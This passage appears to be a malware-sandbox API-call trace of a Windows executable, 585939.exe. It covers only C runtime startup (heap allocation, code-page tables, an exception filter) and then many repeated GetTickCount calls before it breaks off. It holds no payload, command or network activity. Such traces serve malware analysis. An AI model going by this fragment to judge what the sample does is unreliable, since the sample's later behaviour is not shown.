# Flog Txt Version 1 # Analyzer Version: 3.2.2 # Analyzer Build Date: May 6 2020 08:26:37 # Log Creation Date: 07.05.2020 06:27:06.514 Process: id = "1" image_name = "585939.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\585939.exe" page_root = "0x45b7b000" os_pid = "0x54c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x454" cmd_line = "\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\585939.exe\" " cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 1 os_tid = 0x808 [0085.903] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ff7c | out: lpSystemTimeAsFileTime=0x18ff7c*(dwLowDateTime=0xb8197930, dwHighDateTime=0x1d62438)) [0085.903] GetCurrentProcessId () returned 0x54c [0085.903] GetCurrentThreadId () returned 0x808 [0085.903] GetTickCount () returned 0x1150484 [0085.903] QueryPerformanceCounter (in: lpPerformanceCount=0x18ff74 | out: lpPerformanceCount=0x18ff74*=20634373391) returned 1 [0085.957] GetStartupInfoW (in: lpStartupInfo=0x18ff20 | out: lpStartupInfo=0x18ff20*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\585939.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x18ff84, hStdError=0x40e6f9)) [0085.957] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0085.957] HeapCreate (flOptions=0x0, dwInitialSize=0x1000, dwMaximumSize=0x0) returned 0x600000 [0085.959] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0085.959] GetProcAddress (hModule=0x76d30000, lpProcName="FlsAlloc") returned 0x76d44f2b [0085.959] GetProcAddress (hModule=0x76d30000, lpProcName="FlsGetValue") returned 0x76d41252 [0085.959] GetProcAddress (hModule=0x76d30000, lpProcName="FlsSetValue") returned 0x76d44208 [0085.959] GetProcAddress (hModule=0x76d30000, lpProcName="FlsFree") returned 0x76d4359f [0085.961] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x214) returned 0x6007d0 [0085.961] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0085.961] GetCurrentThreadId () returned 0x808 [0085.961] GetStartupInfoW (in: lpStartupInfo=0x18febc | out: lpStartupInfo=0x18febc*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\585939.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x40beaf, hStdOutput=0x40c1e8, hStdError=0x6007d0)) [0085.961] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x800) returned 0x6009f0 [0085.961] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0085.961] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0085.961] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0085.962] SetHandleCount (uNumber=0x20) returned 0x20 [0085.962] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\585939.exe\" " [0085.962] GetEnvironmentStringsW () returned 0x681c58* [0085.962] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xaca) returned 0x6011f8 [0085.962] FreeEnvironmentStringsW (penv=0x681c58) returned 1 [0085.962] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x51d610, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\585939.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\585939.exe")) returned 0x30 [0085.962] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x6a) returned 0x601cd0 [0085.962] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x98) returned 0x601d48 [0085.962] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3e) returned 0x601de8 [0085.962] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x6c) returned 0x601e30 [0085.962] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x6e) returned 0x601ea8 [0085.962] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x78) returned 0x601f20 [0085.962] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x62) returned 0x601fa0 [0085.962] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x2e) returned 0x602010 [0085.962] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x48) returned 0x602048 [0085.962] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28) returned 0x602098 [0085.962] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x1a) returned 0x6020c8 [0085.962] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x4a) returned 0x6020f0 [0085.962] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x72) returned 0x602148 [0085.962] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x30) returned 0x6021c8 [0085.963] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x2e) returned 0x602200 [0085.963] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x1c) returned 0x602238 [0085.963] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0xd2) returned 0x602260 [0085.963] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x7c) returned 0x602340 [0085.963] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x36) returned 0x6023c8 [0085.963] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3a) returned 0x602408 [0085.963] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x90) returned 0x602450 [0085.963] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x24) returned 0x6024e8 [0085.963] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x30) returned 0x602518 [0085.963] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x36) returned 0x602550 [0085.963] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x48) returned 0x602590 [0085.963] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x52) returned 0x6025e0 [0085.963] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c) returned 0x602640 [0085.963] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x82) returned 0x602688 [0085.963] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x2e) returned 0x602718 [0085.963] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x1e) returned 0x602750 [0085.963] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x2c) returned 0x602778 [0085.963] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x54) returned 0x6027b0 [0085.963] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x52) returned 0x602810 [0085.963] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x2a) returned 0x602870 [0085.963] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c) returned 0x6028a8 [0085.963] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x54) returned 0x6028f0 [0085.963] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x24) returned 0x602950 [0085.963] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x30) returned 0x602980 [0085.963] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x8c) returned 0x6029b8 [0085.963] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6011f8 | out: hHeap=0x600000) returned 1 [0085.964] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x80) returned 0x602a50 [0085.964] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0085.964] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0085.964] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x800) returned 0x6011f8 [0085.964] GetLastError () returned 0x0 [0085.964] SetLastError (dwErrCode=0x0) [0085.964] GetLastError () returned 0x0 [0085.964] SetLastError (dwErrCode=0x0) [0085.964] GetLastError () returned 0x0 [0085.964] SetLastError (dwErrCode=0x0) [0085.964] GetACP () returned 0x4e4 [0085.964] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x220) returned 0x601a00 [0085.964] GetLastError () returned 0x0 [0085.964] SetLastError (dwErrCode=0x0) [0085.964] IsValidCodePage (CodePage=0x4e4) returned 1 [0085.964] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18fe84 | out: lpCPInfo=0x18fe84) returned 1 [0085.964] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f950 | out: lpCPInfo=0x18f950) returned 1 [0085.965] GetLastError () returned 0x0 [0085.965] SetLastError (dwErrCode=0x0) [0085.965] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0085.965] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f6c8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0085.965] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18f964 | out: lpCharType=0x18f964) returned 1 [0085.965] GetLastError () returned 0x0 [0085.965] SetLastError (dwErrCode=0x0) [0085.965] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0085.965] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f698, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ撕粍窞@Ā") returned 256 [0085.965] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ撕粍窞@Ā", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0085.965] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ撕粍窞@Ā", cchSrc=256, lpDestStr=0x18f488, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ") returned 256 [0085.965] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ", cchWideChar=256, lpMultiByteStr=0x18fc64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ«'%u\x9cþ\x18", lpUsedDefaultChar=0x0) returned 256 [0085.965] GetLastError () returned 0x0 [0085.965] SetLastError (dwErrCode=0x0) [0085.965] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0085.965] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f6b8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ撕粍窞@Ā") returned 256 [0085.965] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ撕粍窞@Ā", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0085.965] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ撕粍窞@Ā", cchSrc=256, lpDestStr=0x18f4a8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ") returned 256 [0085.965] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ", cchWideChar=256, lpMultiByteStr=0x18fb64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ«'%u\x9cþ\x18", lpUsedDefaultChar=0x0) returned 256 [0085.966] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x40d9f2) returned 0x0 [0085.966] RtlSizeHeap (HeapHandle=0x600000, Flags=0x0, MemoryPointer=0x602a50) returned 0x80 [0085.966] RtlSizeHeap (HeapHandle=0x600000, Flags=0x0, MemoryPointer=0x602a50) returned 0x80 [0085.967] RtlSizeHeap (HeapHandle=0x600000, Flags=0x0, MemoryPointer=0x602a50) returned 0x80 [0085.967] RtlSizeHeap (HeapHandle=0x600000, Flags=0x0, MemoryPointer=0x602a50) returned 0x80 [0085.967] RtlSizeHeap (HeapHandle=0x600000, Flags=0x0, MemoryPointer=0x602a50) returned 0x80 [0085.967] RtlSizeHeap (HeapHandle=0x600000, Flags=0x0, MemoryPointer=0x602a50) returned 0x80 [0085.968] RtlSizeHeap (HeapHandle=0x600000, Flags=0x0, MemoryPointer=0x602a50) returned 0x80 [0085.968] RtlSizeHeap (HeapHandle=0x600000, Flags=0x0, MemoryPointer=0x602a50) returned 0x80 [0085.968] RtlSizeHeap (HeapHandle=0x600000, Flags=0x0, MemoryPointer=0x602a50) returned 0x80 [0085.968] GetTickCount () returned 0x11504c2 [0085.968] GetTickCount () returned 0x11504c2 [0085.968] GetTickCount () returned 0x11504c2 [0085.968] GetTickCount () returned 0x11504c2 [0085.968] GetTickCount () returned 0x11504c2 [0085.968] GetTickCount () returned 0x11504c2 [0085.968] GetTickCount () returned 0x11504c2 [0085.968] GetTickCount () returned 0x11504c2 [0085.969] GetTickCount () returned 0x11504c2 [0085.969] GetTickCount () returned 0x11504c2 [0085.969] GetTickCount () returned 0x11504c2 [0085.969] GetTickCount () returned 0x11504c2 [0085.969] GetTickCount () returned 0x11504c2 [0085.969] GetTickCount () returned 0x11504c2 [0085.969] GetTickCount () returned 0x11504c2 [0085.969] GetTickCount () returned 0x11504c2 [0085.969] GetTickCount () returned 0x11504c2 [0085.969] GetTickCount () returned 0x11504c2 [0085.969] GetTickCount () returned 0x11504c2 [0085.969] GetTickCount () returned 0x11504c2 [0085.969] GetTickCount () returned 0x11504c2 [0085.969] GetTickCount () returned 0x11504c2 [0085.969] GetTickCount () returned 0x11504c2 [0085.969] GetTickCount () returned 0x11504c2 [0085.969] GetTickCount () returned 0x11504c2 [0085.969] GetTickCount () returned 0x11504c2 [0085.969] GetTickCount () returned 0x11504c2 [0085.969] GetTickCount () returned 0x11504c2 [0085.969] GetTickCount () returned 0x11504c2 [0085.969] GetTickCount () returned 0x11504c2 [0085.969] GetTickCount () returned 0x11504c2 [0085.969] GetTickCount () returned 